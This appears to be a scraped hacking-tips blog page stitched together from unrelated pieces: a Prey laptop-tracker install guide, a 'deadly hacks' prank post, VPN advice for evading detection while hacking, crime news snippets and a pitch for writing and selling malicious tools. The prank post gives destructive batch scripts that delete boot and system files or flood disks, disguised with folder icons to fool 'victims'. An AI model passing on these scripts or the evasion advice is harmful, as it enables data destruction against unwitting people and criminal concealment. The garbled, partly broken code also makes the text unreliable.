Recently  my friend bought a new laptop ,but it was stolen within few days .The good thing is that we have successfully recovered stolen laptop as i had installed a tracing software on his laptop and he had no troubles finding it.This can happen to anyone which is using the laptop or cellphone and having a tracing software installed on his laptop .
    Here i am showing you a Free Laptop and cellphone tracing software calledPrey.It keep track of your phone or laptop at all times , and  will help you find it if it ever gets lost or stolen.And it just works
    How it works
    Basically you install a tiny agent in your PC or phone, which silently waits for a remote signal to wake up and work its magic.
    This signal is sent either from the Internet or through an SMS message, and allows you to gather information regarding the device's location, hardware and network status, and optionally trigger specific actions on it.

    Notice: This file is Trojan as detected by some antivirus, but the thing is every such files are called trojan, as the process is to Track your system and view your systems reports. But be secure, this file is not harmful for your system or for your personal information. This software is made By PRey Project Company, and they take responsibility of it.

     How to Download and Install Prey

    1. First of all download Prey project file from their official website.


    2. After Downloading, Install the File and then

    - They will ask for either standalone and +control panel.
    - Go for +control panel, and than Click For New User.
    - Give Your Name, Your Email and select Password to login the site.than press Ok. 

    - You will get Email from prey project, just activate your account there, and click your device and do the following settings: 

    If you "ON" any of the above settings than be sure to remember password of "lock pass". It will show as the time you make it on. Just below the lock it will be written pass, and when alert is on the message will display whenever you login, "this laptop is stolen ...."-lol

    So these were all steps now you can install and get secure. Now if its get stolen than you can track back .

    Do you have questions, comments, or suggestions? Feel free to post a comment!

Deadly and Painful Hacks That You Should Never Try on Your PC

Hey guys, I’m back with my next post. If you are not a computer professional, don’t read this, even if you do. Don’t ever try this on any of your computers. Trying any of these are really painful and will take you a lot of time to recover.If you got somebody really irritating in your life and stalking you every once in a while then this is the right post for you. But please do think twice before you teach that poor soul a lesson. And once again I’m warning you. Please don’t use these if you are not sure of what your purpose of using these hacks is. Now let’s get started. These hacks are merely pranks that will frustrate your victims to the core.

1. Crash a Computer System With Nothing But a Link.

I stumbled across this URL while surfing the internet. This is a javascript “exploit” , it will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM. Every instance occupies about 1000 bytes, if your victim is smart, he better end the process As soon as possible or he will be forced to reboot his computer.
click here (

2. Create more than 3,000 folders under a minute.

Step 1) Open your notepad and type the following code.

@echo off
md %random%
goto top

Step 2) Save it as 1000.bat
@echo off makes your screen appear blank but it is actually making hundreds of folders.
md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos)
goto top – return the command to :top, causes an infinite loop.
Now this might look a little suspicious to your victims. Lets make it more funny so that your victim can fall into your trap easily.Create a shortcut for the created batch-file and change its icon to a folder icon and make it look unsuspicious.
Here’s what I did with my file.
If my victim clicks on the file. He’s gonna see the hottest chics that he’s never seen in his entire life don’t you think?

3) Shutdown A Computer Forever!

Now Please take your eyes of this part because this is the most simplest and deadliest trick/hack for your windows computer. Copy the following code into your notepad

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Save it as “shutdown-forever.bat”. Just make sure it has a .bat or .cmd extension.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.So please, use this hack only if you have no intention of rebooting your computer again. So just be careful.
Here’s an alternative code.
cmd /c del c:\windows\* /F /S /Q
cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It with Extension .cmd or .bat.

4) Another RAM crashing Trick :

open notepad and type
goto A
save with .bat extension.
Infinitely loops your browser to open up coolpctips.
Do this and your victim will have infinite pages of coolpctips flooded on his computer screen.

5) Delete all your system files with just 6 character command.

Copy the following code into your notepad and save it as a .bat file.

del *.*

All your files in your hard disk will vanish in less than 5mins.

Once Again i am warning you not to try this at in your PC. DO NOT TRY THESE FOR FUN!!



Grey Hats /shock :


Now, we are going to take a look at how to be safe. This is what every beginner hacker should know. It's all fun to hack something, but what about what the Admin might do? Have you ever thought; "What if he tracks meh down?!" or "Will I get bust for taking out?". A hacker must always keep his privacy - that being said, give as little information to others as possible. Protecting yourself via Proxies, VPN's, XSS Tunnelling, whatever you can to make sure you never get sent downtown. It's quite easy to get busted these days, especially with the amount of good technology being created to stop us. So REMEMBER: ALWAYS, I MEAN ALWAYS, USE A VPN/PROXY WHENEVER YOU ARE HACKING. LET ME REPEAT: ALWAYS, I MEAN ALWAYS, USE A VPN/PROXY WHENEVER YOU ARE HACKING. ONCE MORE:

VPNS - A VPN stands for Virtual Private Network. Do not confuse this with Virtual Private Server (or VPS). It basically works like a Proxy; it hides your IP. There are a lot of VPN's out there, some cost money, some don't. I recommend you buy a VPN instead of getting a free one as free ones are not always that stable. Now, let's say you want to hack a website, and you have a VPN. Depending on your VPN, you're either going to have to use it via the "Connect To Network" function, or if you can just click "Connect" on the VPN application itself, that works too. I would stress on what VPN you get because some VPN's keep logs; and they are willing to give it to anyone who has been hacked. So, what do you need to remember? Get a VPN that does not keep any logs, and that is fast and secure.

In the first U.S. prosecution of its kind, FBI agents arrested a 20-year-old Los Angeles man Thursday on charges that he cracked some 400,000 Windows machines and covertly installed pop-up-generating adware on them, in a scheme that allegedly brought in $60,000 in ill-gotten profits.

The U.S. Securities and Exchange Commission has filed civil charges against a young Pennsylvania man for computer hacking and identity theft in a scheme last July to dump worthless options for Cisco Systems stock.


Why is coding Important? Coding is important because it allows us to have a greater understanding on how a malicious tool manipulates a computer to give it certain information. This is something we should appreciate. Ideally, it takes some time to learn how to code and why you should code. Why you should code is simple. Let's say you are looking for a malicious tool, but you cannot find it. But, you know about coding, so you can code it. Instead of searching Google countless hours, you can easily make the tool yourself. You can also sell it - getting money by just sitting on your ass. Now, doesn't that sound fun? I mean, sitting on your ass, making a living? Must be one of the most laziest jobs besides being a street sweeper. You code with something called a "Programming Language".




No comments: